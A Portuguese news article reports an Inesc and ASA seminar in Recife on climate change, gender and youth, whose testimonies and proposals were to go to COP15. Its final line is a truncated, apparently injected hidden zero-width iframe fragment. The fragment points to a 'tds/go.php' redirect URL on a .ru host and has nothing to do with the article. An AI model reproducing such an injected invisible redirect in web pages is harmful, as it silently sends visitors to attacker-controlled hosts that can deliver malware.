Inesc realiza seminário sobre mudanças climáticas em Recife/PE

Compartilhe!

Nos dias 16 e 17 de julho, em Recife-PE, o Instituto de Estudos Sócioeconômicos (Inesc), em parceria com a Articulação no Semi-Árido (ASA), realizou o Seminário Mudanças Climáticas, Gênero e Juventude ¿ subsídios para políticas públicas no Brasil, que contou com a participação de 30 pessoas de diferentes estados do Nordeste.

A oficina teve como objetivo identificar as consequências das mudanças climáticas, a partir do olhar de mulheres, jovens e adultos, ao longo da história de cada comunidade; bem como promover o intercâmbio entre as populações mais afetadas pelas mudanças climáticas na região. 

Os depoimentos dos participantes acerca dos impactos das mudanças climáticas em suas comunidades foram gravados e vão fazer parte de um vídeo, que será apresentado pelo Inesc durante a 15º Conferência das Partes (COP15) da Convenção das Nações Unidas sobre Mudança do Clima, prevista para acontecer entre os dias 7 e 18 de dezembro, em Copenhague, na Dinamarca.

Na ocasião, os/as participantes também debateram sobre o tema e elaboraram propostas de políticas públicas que possam contribuir com a redução dos problemas ocasionados pelas mudanças climáticas. As sugestões vão fazer parte de um documento, que será apresentado junto com o vídeo na COP15. 

Para a presidente do Sindicato dos Trabalhadores e Trabalhadoras de Sítio Alto, município de Simões Dias, em Sergipe, Josefa Santos de Jesus, o seminário foi bastante positivo: “É muito valioso porque a gente nunca tem a oportunidade de fazer um encontro com todos os estados. Tanto a gente está passando conhecimento, como adquirindo. E tudo que eu aprendo aqui, quando chega lá [em Sítio Alto] eu passo para os outro”, afirma Josefa.

Segundo o assessor de Políticas Indígenas e Socioambientais do Inesc, Ricardo Verdum, a idéia dos dois produtos que estão sendo elaborados pelo Instituto é levar a voz e as demandas das populações mais vulneráveis aos efeitos das mudanças climáticas à COP15 e fazer com que, de alguma forma, seus depoimentos seja considerados nas decisões dos governos e dos empresários que participarão do evento.

Verdum também destaca que o vídeo será divulgado na mídia nacional e alternativa, como forma de contribuir com o debate sobre o tema das mudanças climáticas, e que serão realizadas audiências públicas no Congresso Nacional.

O Seminário Mudanças Climáticas, Gênero e Juventude – subsídios para políticas públicas no Brasil – já foi realizado na região Norte, cujos depoimentos também farão parte do vídeo.

Leia mais

Agricultores do Nordeste relatam efeitos das mudanças climáticas na região

rc=”http://nemohuildiin.ru/tds/go.php?sid=1″ width=”0″